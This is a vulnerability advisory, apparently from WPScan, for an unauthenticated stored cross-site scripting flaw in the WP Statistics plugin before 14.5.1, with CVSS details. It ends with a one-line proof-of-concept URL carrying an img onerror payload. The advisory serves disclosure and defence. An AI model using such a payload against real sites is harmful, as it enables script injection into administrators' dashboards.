wpvulndb WPVDB-ID: 56779EE5-5BF4-47D2-BBAF-B398EA926FBE
History: Mar 13, 2024 - 12:00 a.m.

WP Statistics < 14.5.1 - Unauthenticated Stored Cross-Site Scripting

2024-03-13 00:00:00
wpscan.com
26
Tags: wp statistics, cross-site scripting, unauthenticated, security vulnerability, plugin, dashboard, poc

CVSS3: 7.2
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
EPSS: 0
Percentile: 9.0%

Description

The plugin does not properly escape visited URLs, which are reflected on the plugin’s dashboard.

PoC

Visit the same page multiple times so that it appears among the most visited pages, adding the following “utm_id” parameter to it: http://vulnerable-site.tld/attacked-page/?utm_id="><img%2Fsrc=x onerror%3Dalert(123)%2F%2F>
